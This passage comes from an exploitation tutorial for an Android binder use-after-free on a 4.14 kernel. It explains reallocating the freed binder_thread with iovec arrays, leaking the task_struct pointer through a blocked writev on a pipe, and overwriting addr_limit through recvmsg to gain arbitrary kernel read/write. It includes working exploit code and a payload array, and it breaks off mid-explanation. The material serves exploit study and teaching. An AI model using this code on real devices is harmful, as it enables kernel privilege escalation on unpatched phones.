Exploitation

In the Root Cause Analysis section, we understood the vulnerability and why it happens.

We know that the dangling binder_thread chunk is used in two places.

The first use happens when the remove_wait_queue function tries to acquire the spin lock. However, it is not very interesting from an exploitation point of view.

The second use happens in the internal function __remove_wait_queue, where it unlinks the poll wait queue entry. This is very interesting from an exploitation point of view, because it gives us a primitive that writes a pointer to binder_thread->wait.head into binder_thread->wait.head.next and binder_thread->wait.head.prev of the dangling chunk.

Let's revisit struct binder_thread, which is defined in workshop/android-4.14-dev/goldfish/drivers/android/binder.c.

```c
struct binder_thread {
    struct binder_proc *proc;
    struct rb_node rb_node;
    struct list_head waiting_thread_node;
    int pid;
    int looper;              /* only modified by this thread */
    bool looper_need_return; /* can be written by other thread */
    struct binder_transaction *transaction_stack;
    struct list_head todo;
    bool process_todo;
    struct binder_error return_error;
    struct binder_error reply_error;
    wait_queue_head_t wait;
    struct binder_stats stats;
    atomic_t tmp_ref;
    bool is_dead;
    struct task_struct *task;
};
```

If you look closely, you will notice that a pointer to struct task_struct is also a member of the binder_thread structure.

If we can somehow leak it, we will know where the task_struct of the current process is.

Note: Read more about the task_struct structure and Linux privilege escalation in the Linux Privilege Escalation section.

Now, let's see how we can exploit this vulnerability. As exploit mitigations keep increasing, it is very important to build strong primitives.

Primitive

The task_struct structure has an important member, addr_limit, of type mm_segment_t. addr_limit stores the highest valid user space address.

addr_limit is part of struct thread_info or struct thread_struct, depending on the target architecture. As we are dealing with an x86_64 system, addr_limit is defined in struct thread_struct, which is embedded in task_struct as its thread member.

To understand addr_limit better, let's look at the prototypes of the read and write system calls.

```c
ssize_t read(int fd, void *buf, size_t count);
ssize_t write(int fd, const void *buf, size_t count);
```

System calls such as read and write pass user space pointers into the kernel. This is where addr_limit comes into the picture: before touching such a pointer, the kernel uses the access_ok function to validate that the passed address range really lies in user space.

As we are on an x86_64 system at the moment, let's open workshop/android-4.14-dev/goldfish/arch/x86/include/asm/uaccess.h and see how access_ok is defined.

```c
#define access_ok(type, addr, size)                                 \
({                                                                  \
    WARN_ON_IN_IRQ();                                               \
    likely(!__range_not_ok(addr, size, user_addr_max()));           \
})

#define user_addr_max() (current->thread.addr_limit.seg)
```

As you can see, access_ok checks the range against user_addr_max(), which is current->thread.addr_limit.seg. If we can clobber addr_limit with 0xFFFFFFFFFFFFFFFF, kernel addresses will pass this check too, and we will be able to read and write any part of kernel memory.
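To make the effect of addr_limit concrete, here is a small user-space model of the range test behind access_ok. It is a sketch, not kernel code: it assumes the x86_64 USER_DS value of (1 << 47) - 4096 and mirrors the non-constant-size path of __chk_range_not_ok(), where a range is rejected if addr + size wraps around or ends above the limit. The names prefixed with SKETCH_ and the helper functions are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Assumed x86_64 USER_DS: TASK_SIZE_MAX = (1 << 47) - PAGE_SIZE. */
#define SKETCH_USER_DS          ((UINT64_C(1) << 47) - 4096)
/* The value the text proposes to write into addr_limit. */
#define SKETCH_CLOBBERED_LIMIT  UINT64_MAX

/* Model of the range check: reject if addr + size overflows or
 * if the end of the range lies above the limit. */
static bool range_not_ok(uint64_t addr, uint64_t size, uint64_t limit)
{
    uint64_t end = addr + size;
    if (end < size)          /* addr + size wrapped around */
        return true;
    return end > limit;
}

/* access_ok() succeeds when the range is NOT out of range. */
static bool access_ok_model(uint64_t addr, uint64_t size, uint64_t addr_limit)
{
    return !range_not_ok(addr, size, addr_limit);
}
```

With the normal limit, a kernel heap address such as 0xffff888063a14b00 is rejected; once addr_limit is clobbered, the same address is accepted, which is what turns ordinary read and write calls into kernel memory accessors.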

Note: Vitaly Nikolenko (@vnik5287) pointed out that on arm64 there is a check in the do_page_fault function that will crash the process if addr_limit is set to 0xFFFFFFFFFFFFFFFF. I did all of my tests on an x86_64 system, so I did not notice that in the beginning.

Let's open workshop/android-4.14-dev/goldfish/arch/arm64/mm/fault.c and investigate do_page_fault function.

```c
static int __kprobes do_page_fault(unsigned long addr, unsigned int esr,
                                   struct pt_regs *regs)
{
    struct task_struct *tsk;
    struct mm_struct *mm;
    int fault, sig, code, major = 0;
    unsigned long vm_flags = VM_READ | VM_WRITE;
    unsigned int mm_flags = FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_KILLABLE;

    [...]

    if (is_ttbr0_addr(addr) && is_permission_fault(esr, regs, addr)) {
        /* regs->orig_addr_limit may be 0 if we entered from EL0 */
        if (regs->orig_addr_limit == KERNEL_DS)
            die("Accessing user space memory with fs=KERNEL_DS", regs, esr);

        [...]
    }

    [...]

    return 0;
}
```

- if a permission fault on a user space (TTBR0) address occurs while regs->orig_addr_limit == KERNEL_DS, it calls die() and crashes; on arm64, KERNEL_DS is 0xFFFFFFFFFFFFFFFF

For better compatibility of the exploit across x86_64 and arm64, it's better to set addr_limit to 0xFFFFFFFFFFFFFFFE, which still covers kernel space but is not equal to KERNEL_DS.

Using this vulnerability, we would like to corrupt addr_limit to upgrade our simple primitive to a more powerful one: an arbitrary read/write primitive.

Exploits built on an arbitrary read/write primitive are often called data-only attacks: we do not hijack the execution flow of the CPU, and instead corrupt targeted data structures to achieve privilege escalation.

Corruption Target

We are going to use struct iovec as the corruption target, as Maddie Stone and Jann Horn of Project Zero did. The use of struct iovec as a corruption target was first published by Di Shen of KeenLab.



struct iovec is used for Vectored I/O, also known as Scatter/Gather I/O.

Vectored I/O lets a single system call read data into multiple buffers (scatter) or write data from multiple buffers (gather). This reduces the overhead of issuing a separate read or write system call for every buffer.

In Linux, Vectored I/O is achieved using the iovec structure and system calls like readv, writev, recvmsg, sendmsg, etc.

Let's see how struct iovec is defined in workshop/android-4.14-dev/goldfish/include/uapi/linux/uio.h.

```c
struct iovec
{
    void __user *iov_base;    /* BSD uses caddr_t (1003.1g requires void *) */
    __kernel_size_t iov_len;  /* Must be size_t (1003.1g) */
};
```
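To see scatter/gather from user space, the sketch below gathers three separate buffers into a pipe with one writev() call and then scatters the bytes back into two buffers with one readv() call. The function name vectored_io_roundtrip is hypothetical; readv, writev and pipe are the standard POSIX calls.

```c
#include <assert.h>
#include <string.h>
#include <sys/uio.h>
#include <unistd.h>

/* Gather three buffers into a pipe, then scatter them into two buffers.
 * Returns the number of bytes moved, or -1 on error. */
static int vectored_io_roundtrip(char *first, size_t first_len,
                                 char *second, size_t second_len)
{
    int fds[2];
    if (pipe(fds) == -1)
        return -1;

    char a[] = "Hello, ";
    char b[] = "vectored ";
    char c[] = "I/O";
    struct iovec out[3] = {
        { .iov_base = a, .iov_len = strlen(a) },
        { .iov_base = b, .iov_len = strlen(b) },
        { .iov_base = c, .iov_len = strlen(c) },
    };
    ssize_t written = writev(fds[1], out, 3);   /* gather: 3 buffers, 1 call */

    struct iovec in[2] = {
        { .iov_base = first,  .iov_len = first_len },
        { .iov_base = second, .iov_len = second_len },
    };
    ssize_t nread = readv(fds[0], in, 2);       /* scatter: 1 call, 2 buffers */

    close(fds[0]);
    close(fds[1]);
    return (written == nread) ? (int)nread : -1;
}
```

Reading into a 7-byte and a 12-byte buffer puts "Hello, " in the first and "vectored I/O" in the second: the kernel walks the iovec array in order, which is the same walk we later abuse.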

To better understand Vectored I/O and how iovec works, let's look at the diagram below.

Advantages of struct iovec

- it is small in size: on a 64-bit system, its size is 0x10 bytes
- we control all of its members, iov_base and iov_len
- we can stack them together to target the desired kmalloc cache
- it holds a pointer to a buffer and the length of that buffer, which makes it a great target for corruption

One of the main issues with struct iovec is that it is short-lived: the kernel copy is allocated when a system call starts working with the buffers and freed as soon as the call returns to user mode.

We want the iovec array to stay in the kernel while we trigger the unlink operation, so that an iov_base pointer gets overwritten with the address of binder_thread->wait.head, giving us a scoped read and write.

Note: We are on the Android 4.14 kernel; however, Project Zero wrote their exploit for the Android 4.4 kernel, which does not have the additional access_ok checks in lib/iov_iter.c. So, we had already applied a patch to revert those additional checks, which would otherwise prevent us from leaking kernel memory.

How do we make the iovec structure stay in the kernel until we trigger the unlink operation?

One way is to use system calls like readv and writev on a pipe file descriptor, because they block when the pipe is empty (readv) or full (writev).

A pipe is a unidirectional data channel that can be used for interprocess communication. Its blocking behavior gives us a significant time window to corrupt the iovec structure in kernel space.
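The sketch below shows the blocking condition the exploit relies on: after shrinking a pipe to one page with F_SETPIPE_SZ and filling that page, any further write has to wait for a reader. To keep the demo from hanging, it sets O_NONBLOCK so the would-block state shows up as EAGAIN; the exploit itself uses a blocking descriptor. The function name is hypothetical, and a 4096-byte page size is assumed.

```c
#define _GNU_SOURCE              /* F_SETPIPE_SZ is Linux-specific */
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

/* Returns 1 if a write to a full one-page pipe would block, 0 if not,
 * -1 if the pipe could not be created. Assumes 4096-byte pages. */
static int pipe_full_would_block(void)
{
    int fds[2];
    char page[4096];
    int result = 0;

    if (pipe(fds) == -1)
        return -1;

    /* Shrink the capacity from the default 64 KiB to a single page. */
    if (fcntl(fds[1], F_SETPIPE_SZ, (int)sizeof(page)) == -1)
        goto out;

    /* Non-blocking only so this demo can observe "would block". */
    if (fcntl(fds[1], F_SETFL, O_NONBLOCK) == -1)
        goto out;

    memset(page, 'A', sizeof(page));
    if (write(fds[1], page, sizeof(page)) != (ssize_t)sizeof(page))
        goto out;

    /* The pipe is full: a blocking writev() would sleep here. */
    result = (write(fds[1], "B", 1) == -1 && errno == EAGAIN);
out:
    close(fds[0]);
    close(fds[1]);
    return result;
}
```

In the exploit the equivalent moment is writev() sleeping inside the kernel with the kmalloc'd iovec array still alive, until the child reads the page out of the pipe.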

In the same manner, we can make the recvmsg system call block by passing MSG_WAITALL as the flags parameter.

Let's dig into the writev system call and figure out how it uses the iovec structure. Let's open workshop/android-4.14-dev/goldfish/fs/read_write.c and look at the implementation.

```c
SYSCALL_DEFINE3(writev, unsigned long, fd, const struct iovec __user *, vec,
                unsigned long, vlen)
{
    return do_writev(fd, vec, vlen, 0);
}

static ssize_t do_writev(unsigned long fd, const struct iovec __user *vec,
                         unsigned long vlen, rwf_t flags)
{
    struct fd f = fdget_pos(fd);
    ssize_t ret = -EBADF;

    if (f.file) {
        [...]
        ret = vfs_writev(f.file, vec, vlen, &pos, flags);
        [...]
    }

    [...]

    return ret;
}

static ssize_t vfs_writev(struct file *file, const struct iovec __user *vec,
                          unsigned long vlen, loff_t *pos, rwf_t flags)
{
    struct iovec iovstack[UIO_FASTIOV];
    struct iovec *iov = iovstack;
    struct iov_iter iter;
    ssize_t ret;

    ret = import_iovec(WRITE, vec, vlen, ARRAY_SIZE(iovstack), &iov, &iter);
    if (ret >= 0) {
        [...]
        ret = do_iter_write(file, &iter, pos, flags);
        [...]
    }

    return ret;
}
```

- writev passes the pointer to the iovec array and the number of iovec structures from user space to do_writev
- do_writev passes the same information to vfs_writev, along with some additional parameters
- vfs_writev passes the same information to import_iovec, along with some additional parameters

Let's open workshop/android-4.14-dev/goldfish/lib/iov_iter.c and look at the implementation of import_iovec function.

```c
int import_iovec(int type, const struct iovec __user * uvector,
                 unsigned nr_segs, unsigned fast_segs,
                 struct iovec **iov, struct iov_iter *i)
{
    ssize_t n;
    struct iovec *p;

    n = rw_copy_check_uvector(type, uvector, nr_segs, fast_segs,
                              *iov, &p);
    [...]
    iov_iter_init(i, type, p, nr_segs, n);
    *iov = p == *iov ? NULL : p;
    return 0;
}
```

- import_iovec passes the same information about the iovec array to rw_copy_check_uvector, along with some additional parameters
- it initializes the iov_iter over the kernel copy of the iovec array by calling iov_iter_init

Let's open workshop/android-4.14-dev/goldfish/fs/read_write.c and look at the implementation of rw_copy_check_uvector function.

```c
ssize_t rw_copy_check_uvector(int type, const struct iovec __user * uvector,
                              unsigned long nr_segs, unsigned long fast_segs,
                              struct iovec *fast_pointer,
                              struct iovec **ret_pointer)
{
    unsigned long seg;
    ssize_t ret;
    struct iovec *iov = fast_pointer;

    [...]

    if (nr_segs > fast_segs) {
        iov = kmalloc(nr_segs*sizeof(struct iovec), GFP_KERNEL);
        [...]
    }

    if (copy_from_user(iov, uvector, nr_segs*sizeof(*uvector))) {
        [...]
    }

    [...]

    ret = 0;
    for (seg = 0; seg < nr_segs; seg++) {
        void __user *buf = iov[seg].iov_base;
        ssize_t len = (ssize_t)iov[seg].iov_len;

        [...]

        if (type >= 0
            && unlikely(!access_ok(vrfy_dir(type), buf, len))) {
            [...]
        }

        if (len > MAX_RW_COUNT - ret) {
            len = MAX_RW_COUNT - ret;
            iov[seg].iov_len = len;
        }

        ret += len;
    }

    [...]

    return ret;
}
```

- rw_copy_check_uvector allocates kernel memory with kmalloc when nr_segs is larger than fast_segs (ARRAY_SIZE(iovstack), i.e., UIO_FASTIOV, which is 8), and calculates the size of the allocation as nr_segs*sizeof(struct iovec)
  - here, nr_segs is equal to the number of iovec structures that we passed from user space
- it copies the iovec array from user space into the newly allocated kernel memory by calling copy_from_user
- it validates each iov_base pointer by calling access_ok

As you can see, rw_copy_check_uvector helps us control the desired kmalloc cache: the number of iovec structures we pass decides the size of the kernel allocation.

Leaking task_struct*

Let's look at the strategy to leak the task_struct pointer stored in binder_thread. This time we use the writev system call, as we want a scoped read from kernel space to user space.

The size of the binder_thread structure is 408 bytes. If you are familiar with the SLUB allocator, you know that the kmalloc-512 cache holds objects whose size is greater than 256 bytes and less than or equal to 512 bytes. As binder_thread is 408 bytes, it ends up in the kmalloc-512 cache.

First, we need to figure out how many iovec structures we need to stack up to reallocate the freed binder_thread chunk.

```
gef> p /d sizeof(struct binder_thread)
$4 = 408
gef> p /d sizeof(struct iovec)
$5 = 16
gef> p /d sizeof(struct binder_thread) / sizeof(struct iovec)
$9 = 25
gef> p /d 25*16
$16 = 400
```

We see that we will need to stack up 25 iovec structures to reallocate the dangling chunk.
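The same arithmetic can be written down as a small helper. This is a simplified sketch: it assumes the generic kmalloc caches are powers of two, ignoring kmalloc-96 and kmalloc-192, which do not affect the 400 to 408 byte sizes used here. Both helper names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <sys/uio.h>

/* Smallest power-of-two kmalloc-<N> cache (N >= 8) that fits `size`
 * bytes. Simplification: the real kernel also has kmalloc-96/-192. */
static size_t kmalloc_cache_for(size_t size)
{
    size_t cache = 8;
    while (cache < size)
        cache <<= 1;
    return cache;
}

/* How many iovec entries fit inside an object of `object_size` bytes
 * without exceeding it (so trailing fields of the victim stay intact). */
static size_t iovecs_to_fill(size_t object_size)
{
    return object_size / sizeof(struct iovec);
}
```

For binder_thread this gives 25 entries (400 bytes), and both 400 and 408 bytes fall into kmalloc-512, so the kernel copy of the iovec array can land in the freed chunk. 25 is also larger than UIO_FASTIOV, so rw_copy_check_uvector really does call kmalloc instead of using the on-stack array.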

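Note: 25 iovec structures are 400 bytes in size. This works in our favor: task is the last member of binder_thread, at offset 400 (408 - 8), just past the iovec array. Otherwise, the task_struct pointer would also get clobbered and we would not be able to leak it.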

If you remember, the unlink operation writes two quadwords to the dangling chunk. Let's figure out which iovec structures will be clobbered.

```
gef> p /d offsetof(struct binder_thread, wait) / sizeof(struct iovec)
$13 = 10
```

| offset | binder_thread | iovecStack |
|---|---|---|
| 0x00 | ... | iovecStack[0].iov_base = 0x0000000000000000 |
| 0x08 | ... | iovecStack[0].iov_len = 0x0000000000000000 |
| ... | ... | ... |
| ... | ... | ... |
| 0xA0 | wait.lock | iovecStack[10].iov_base = m_4gb_aligned_page |
| 0xA8 | wait.head.next | iovecStack[10].iov_len = PAGE_SIZE |
| 0xB0 | wait.head.prev | iovecStack[11].iov_base = 0x41414141 |
| 0xB8 | ... | iovecStack[11].iov_len = PAGE_SIZE |
| ... | ... | ... |

As we can see from the above table, iovecStack[10].iov_len and iovecStack[11].iov_base will be clobbered.
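The table can be reproduced mechanically: each 16-byte iovec covers two 8-byte slots, iov_base first and iov_len second. The sketch below hard-codes the offsets from the table (0xA0, 0xA8, 0xB0) and the task offset of 400 derived from sizeof(struct binder_thread) = 408; these are specific to this goldfish build and are assumptions, not portable values. It also derives, under the same assumptions, where the task pointer would sit in the leaked data, since the corrupted iov_base points at wait.head (offset 0xA8).

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Offsets assumed from the overlap table for this particular build. */
#define WAIT_LOCK_OFFSET  0xA0   /* binder_thread->wait.lock      */
#define WAIT_NEXT_OFFSET  0xA8   /* binder_thread->wait.head.next */
#define WAIT_PREV_OFFSET  0xB0   /* binder_thread->wait.head.prev */
#define TASK_OFFSET       400    /* binder_thread->task (408 - 8) */
#define IOVEC_SIZE        16

/* Index of the iovec entry that overlaps byte `offset` of the chunk. */
static size_t iovec_index(size_t offset)
{
    return offset / IOVEC_SIZE;
}

/* Which member of that iovec entry overlaps byte `offset`. */
static const char *iovec_field(size_t offset)
{
    return (offset % IOVEC_SIZE) < 8 ? "iov_base" : "iov_len";
}

/* The leaked page starts at &wait.head, so the task pointer is found
 * this many bytes into the data read back from the pipe. */
static size_t task_offset_in_leak(void)
{
    return TASK_OFFSET - WAIT_NEXT_OFFSET;
}
```

Under these assumptions wait.lock lands on iovecStack[10].iov_base, the two unlink writes land on iovecStack[10].iov_len and iovecStack[11].iov_base, the task pointer lies at index 25 (outside the 25-entry array), and it would appear 0xE8 bytes into the leaked data.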

So, we want writev to process iovecStack[10] and block, and only then trigger the unlink operation. After the unlink has clobbered iovecStack[11].iov_base, we resume the writev system call, which writes the contents of the binder_thread chunk into the pipe. Finally, we read that data back in user space and extract the task_struct pointer from it.

But, what's the importance of m_4gb_aligned_page in this case?

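Before doing the unlink operation, remove_wait_queue tries to acquire the wait.lock spin lock, which overlaps iovecStack[10].iov_base. If the lock value is not 0, the thread keeps spinning and the unlink operation never happens. spinlock_t is 32 bits wide while iov_base is a 64-bit value, so we need iov_base to be a valid user address whose lower 32 bits are 0, which is exactly what a 4 GB aligned page gives us.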

Note: To make effective use of the blocking behavior of the writev system call, we need at least two lightweight processes.



Let's build the attack plan to leak the task_struct pointer:

- create a pipe, get the file descriptors, and set the maximum buffer size to PAGE_SIZE
- link the eventpoll wait queue to the binder_thread wait queue
- fork the process
- parent process
  - free the binder_thread structure
  - trigger the writev system call and keep blocking
  - once the writev system call resumes, it will process iovecStack[11], which is already clobbered due to the unlink operation
  - read the pointer to task_struct from the leaked kernel space chunk
- child process
  - sleep to avoid race conditions
  - trigger the unlink operation
  - read the dummy data from the pipe, which was written by processing iovecStack[10]; this resumes the writev system call

To better understand the flow of the exploitation, let's look at the diagram Maddie Stone created for the Project Zero blog post. The diagram is very accurate, so I do not want to redraw it.

Now, let's see how the same can be achieved in the exploit code.

```cpp
void BinderUaF::leakTaskStruct() {
    int pipe_fd[2] = {0};
    ssize_t nBytesRead = 0;
    static char dataBuffer[PAGE_SIZE] = {0};
    struct iovec iovecStack[IOVEC_COUNT] = {nullptr};

    //
    // Get binder fd
    //
    setupBinder();

    //
    // Create event poll
    //
    setupEventPoll();

    //
    // We are going to use iovec for scoped read/write,
    // we need to make sure that iovec stays in the kernel
    // before we trigger the unlink after binder_thread has
    // been freed.
    //
    // One way to achieve this is by using the blocking APIs
    // in Linux kernel. Such APIs are read, write, etc on pipe.
    //

    //
    // Setup pipe for iovec
    //
    INFO("[+] Setting up pipe\n");

    if (pipe(pipe_fd) == -1) {
        ERR("\t[-] Unable to create pipe\n");
        exit(EXIT_FAILURE);
    } else {
        INFO("\t[*] Pipe created successfully\n");
    }

    //
    // pipe_fd[0] = read fd
    // pipe_fd[1] = write fd
    //
    // Default size of pipe is 65536 = 0x10000 = 64KB
    // This is much more data than we care about
    // Let's reduce the size of pipe to 0x1000
    //
    if (fcntl(pipe_fd[0], F_SETPIPE_SZ, PAGE_SIZE) == -1) {
        ERR("\t[-] Unable to change the pipe capacity\n");
        exit(EXIT_FAILURE);
    } else {
        INFO("\t[*] Changed the pipe capacity to: 0x%x\n", PAGE_SIZE);
    }

    INFO("[+] Setting up iovecs\n");

    //
    // As we are overlapping binder_thread with iovec,
    // binder_thread->wait.lock will align to iovecStack[10].iov_base.
    //
    // If binder_thread->wait.lock is not 0 then the thread will get
    // stuck in trying to acquire the lock and the unlink operation
    // will not happen.
    //
    // To avoid this, we need to make sure that the overlapped data
    // is set to 0.
    //
    // iovec.iov_base is a 64bit value, and spinlock_t is 32bit, so if
    // we can pass a valid memory address whose lower 32bit value is 0,
    // then we can avoid the spin lock issue.
    //
    mmap4gbAlignedPage();

    iovecStack[IOVEC_WQ_INDEX].iov_base = m_4gb_aligned_page;
    iovecStack[IOVEC_WQ_INDEX].iov_len = PAGE_SIZE;
    iovecStack[IOVEC_WQ_INDEX + 1].iov_base = (void *) 0x41414141;
    iovecStack[IOVEC_WQ_INDEX + 1].iov_len = PAGE_SIZE;

    //
    // Now link the poll wait queue to binder thread wait queue
    //
    linkEventPollWaitQueueToBinderThreadWaitQueue();

    //
    // We should trigger the unlink operation when we
    // have the binder_thread reallocated as iovec array
    //

    //
    // Now fork
    //
    pid_t childPid = fork();

    if (childPid == 0) {
        //
        // child process
        //

        //
        // There is a race window between the unlink and blocking
        // in writev, so sleep for a while to ensure that we are
        // blocking in writev before the unlink happens
        //
        sleep(2);

        //
        // Trigger the unlink operation on the reallocated chunk
        //
        unlinkEventPollWaitQueueFromBinderThreadWaitQueue();

        //
        // First interesting iovec will read 0x1000 bytes of data.
        // This is just the junk data that we are not interested in
        //
        nBytesRead = read(pipe_fd[0], dataBuffer, sizeof(dataBuffer));

        if (nBytesRead != PAGE_SIZE) {
            ERR("\t[-] CHILD: read failed. nBytesRead: 0x%lx, expected: 0x%x", nBytesRead, PAGE_SIZE);
            exit(EXIT_FAILURE);
        }

        exit(EXIT_SUCCESS);
    }

    //
    // parent process
    //

    //
    // I have seen some races which hinder the reallocation.
    // So, now freeing the binder_thread after fork.
    //
    freeBinderThread();

    //
    // Reallocate binder_thread as iovec array
    //
    // We need to make sure this writev call blocks
    // This will only happen when the pipe is already full
    //

    //
    // This print statement was ruining the reallocation,
    // spent a night to figure this out. Commenting the
    // below line.
    //
    // INFO("[+] Reallocating binder_thread\n");

    ssize_t nBytesWritten = writev(pipe_fd[1], iovecStack, IOVEC_COUNT);

    //
    // If the corruption was successful, the total bytes written
    // should be equal to 0x2000. This is because there are two
    // valid iovec and the length of each is 0x1000
    //
    if (nBytesWritten != PAGE_SIZE * 2) {
        ERR("\t[-] writev failed. nBytesWritten: 0x%lx, expected: 0x%x\n", nBytesWritten, PAGE_SIZE * 2);
        exit(EXIT_FAILURE);
    } else {
        INFO("\t[*] Wrote 0x%lx bytes\n", nBytesWritten);
    }

    //
    // Now read the actual data from the corrupted iovec
    // This is the leaked data from kernel address space
    // and will contain the task_struct pointer
    //
    nBytesRead = read(pipe_fd[0], dataBuffer, sizeof(dataBuffer));

    if (nBytesRead != PAGE_SIZE) {
        ERR("\t[-] read failed. nBytesRead: 0x%lx, expected: 0x%x", nBytesRead, PAGE_SIZE);
        exit(EXIT_FAILURE);
    }

    //
    // Wait for the child process to exit
    //
    wait(nullptr);

    m_task_struct = (struct task_struct *) *((int64_t *) (dataBuffer + TASK_STRUCT_OFFSET_IN_LEAKED_DATA));
    m_pidAddress = (void *) ((int8_t *) m_task_struct + offsetof(struct task_struct, pid));
    m_credAddress = (void *) ((int8_t *) m_task_struct + offsetof(struct task_struct, cred));
    m_nsproxyAddress = (void *) ((int8_t *) m_task_struct + offsetof(struct task_struct, nsproxy));

    INFO("[+] Leaked task_struct: %p\n", m_task_struct);
    INFO("\t[*] &task_struct->pid: %p\n", m_pidAddress);
    INFO("\t[*] &task_struct->cred: %p\n", m_credAddress);
    INFO("\t[*] &task_struct->nsproxy: %p\n", m_nsproxyAddress);
}
```

I hope you now have a better idea of what is going on and how an in-flight iovec structure was used to leak the task_struct pointer.

Clobber addr_limit

We have leaked the task_struct pointer; now it's time to clobber addr_limit (of type mm_segment_t).

We can't use writev here, because this time we want a scoped write to kernel space rather than a scoped read. Initially, I tried to use the blocking behavior of readv to achieve the scoped write, but I ran into a few issues that prevent us from using it.

Here are the reasons:

- readv will not process one iovec and then block the way writev does
- when iovecStack[10].iov_len is clobbered with a pointer, the length becomes a huge number, and when the copy_page_to_iter_iovec function processes the iovec array, the copy goes wrong

Let's open workshop/android-4.14-dev/goldfish/lib/iov_iter.c and see the implementation of copy_page_to_iter_iovec function.

```c
static size_t copy_page_to_iter_iovec(struct page *page, size_t offset, size_t bytes,
                                      struct iov_iter *i)
{
    size_t skip, copy, left, wanted;
    const struct iovec *iov;
    char __user *buf;
    void *kaddr, *from;

    [...]

    while (unlikely(!left && bytes)) {
        iov++;
        buf = iov->iov_base;
        copy = min(bytes, iov->iov_len);
        left = copyout(buf, from, copy);
        [...]
    }

    [...]

    return wanted - bytes;
}
```

- when it tries to process the clobbered iovecStack[10], it computes the length of the copy in this line: copy = min(bytes, iov->iov_len)
  - bytes is equal to the sum of all the iov_len values in iovecStack
  - iov->iov_len is iovecStack[10].iov_len, which is now clobbered with a pointer
- this is where things go wrong: the length now becomes copy = bytes, which skips the processing of iovecStack[11], the iovec that would have given us the scoped write
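The effect of copy = min(bytes, iov->iov_len) can be reproduced with a simplified model of the segment walk: the bytes to copy are handed out segment by segment, each receiving min(remaining, iov_len). This is a sketch of the arithmetic only, not the kernel function; the helper name and the three-entry arrays (standing in for iovecStack[10..12]) are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Distribute `bytes` over consecutive segments, each taking
 * min(remaining, iov_len[seg]), and report how many bytes reach
 * segment `target`. */
static size_t bytes_reaching_segment(const uint64_t *iov_len, size_t nr_segs,
                                     size_t bytes, size_t target)
{
    for (size_t seg = 0; seg < nr_segs && bytes; seg++) {
        size_t copy = bytes < iov_len[seg] ? bytes : (size_t)iov_len[seg];
        if (seg == target)
            return copy;
        bytes -= copy;
    }
    return 0;
}
```

With intact lengths {1, 0x20, 0x8} and 0x29 bytes to copy, the second segment receives its full 0x20 bytes. Replace the first length with a kernel pointer such as 0xffff888063a14ba8 and the first segment swallows all 0x29 bytes, leaving nothing for the segment that was supposed to perform the scoped write.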

To achieve the scoped write, we are going to make the recvmsg system call block by passing MSG_WAITALL as the flags parameter. The recvmsg system call can block just like the writev system call and does not run into the issue we discussed with the readv system call.
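The blocking behavior itself can be observed safely in user space. In this sketch, one byte is queued on an AF_UNIX stream socketpair before recvmsg() is called with MSG_WAITALL and two iovecs: the byte fills the first iovec, and the call then waits until a forked child sends the remaining 12 bytes for the second iovec. The function name and payload are hypothetical; socketpair, recvmsg and MSG_WAITALL are the standard interfaces.

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns the number of bytes recvmsg() delivered, or -1 on error. */
static ssize_t waitall_demo(char *head, size_t head_len,
                            char *tail, size_t tail_len)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1)
        return -1;

    /* Only one byte is available up front: enough for the first iovec. */
    if (write(sv[1], "A", 1) != 1)
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        sleep(1);                        /* parent is blocked in recvmsg */
        ssize_t n = write(sv[1], "rest of data", 12);
        _exit(n == 12 ? 0 : 1);
    }

    struct iovec iov[2] = {
        { .iov_base = head, .iov_len = head_len },
        { .iov_base = tail, .iov_len = tail_len },
    };
    struct msghdr msg;
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = iov;
    msg.msg_iovlen = 2;

    /* MSG_WAITALL: do not return until both iovecs are full. */
    ssize_t received = recvmsg(sv[0], &msg, MSG_WAITALL);

    waitpid(pid, NULL, 0);
    close(sv[0]);
    close(sv[1]);
    return received;
}
```

Calling it with a 1-byte and a 12-byte buffer returns 13 only after the child's delayed write, which is the window the exploit uses to run the unlink while the kernel still holds the iovec array.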

Let's see what we want to write to addr_limit field.

```
gef> p sizeof(mm_segment_t)
$17 = 0x8
```

As mm_segment_t is 0x8 bytes, we clobber it with 0xFFFFFFFFFFFFFFFE: access_ok still accepts practically every kernel address, but the value is not equal to KERNEL_DS, so the do_page_fault check on arm64 will not crash the process if a page fault occurs.

Now, let's see how the binder_thread chunk overlaps with the iovec array in this case.

| offset | binder_thread | iovecStack |
|---|---|---|
| 0x00 | ... | iovecStack[0].iov_base = 0x0000000000000000 |
| 0x08 | ... | iovecStack[0].iov_len = 0x0000000000000000 |
| ... | ... | ... |
| ... | ... | ... |
| 0xA0 | wait.lock | iovecStack[10].iov_base = m_4gb_aligned_page |
| 0xA8 | wait.head.next | iovecStack[10].iov_len = 1 |
| 0xB0 | wait.head.prev | iovecStack[11].iov_base = 0x41414141 |
| 0xB8 | ... | iovecStack[11].iov_len = 0x8 + 0x8 + 0x8 + 0x8 |
| 0xC0 | ... | iovecStack[12].iov_base = 0x42424242 |
| 0xC8 | ... | iovecStack[12].iov_len = 0x8 |
| ... | ... | ... |

Again, iovecStack[10].iov_len and iovecStack[11].iov_base will be clobbered with a pointer. However, we trigger the unlink operation only after iovecStack[10] has been processed and the recvmsg system call is blocked, waiting to receive the rest of the data.

Once the clobber is done, we write the rest of the data (finalSocketData) to the socket file descriptor, and the recvmsg system call resumes automatically.

```cpp
static uint64_t finalSocketData[] = {
    0x1,                                    // iovecStack[IOVEC_WQ_INDEX].iov_len
    0x41414141,                             // iovecStack[IOVEC_WQ_INDEX + 1].iov_base
    0x8 + 0x8 + 0x8 + 0x8,                  // iovecStack[IOVEC_WQ_INDEX + 1].iov_len
    (uint64_t) ((uint8_t *) m_task_struct +
                OFFSET_TASK_STRUCT_ADDR_LIMIT), // iovecStack[IOVEC_WQ_INDEX + 2].iov_base
    0xFFFFFFFFFFFFFFFE                      // addr_limit value
};
```

Let's see what will happen after the clobber:

- iovecStack[10] is already processed before we trigger the unlink operation
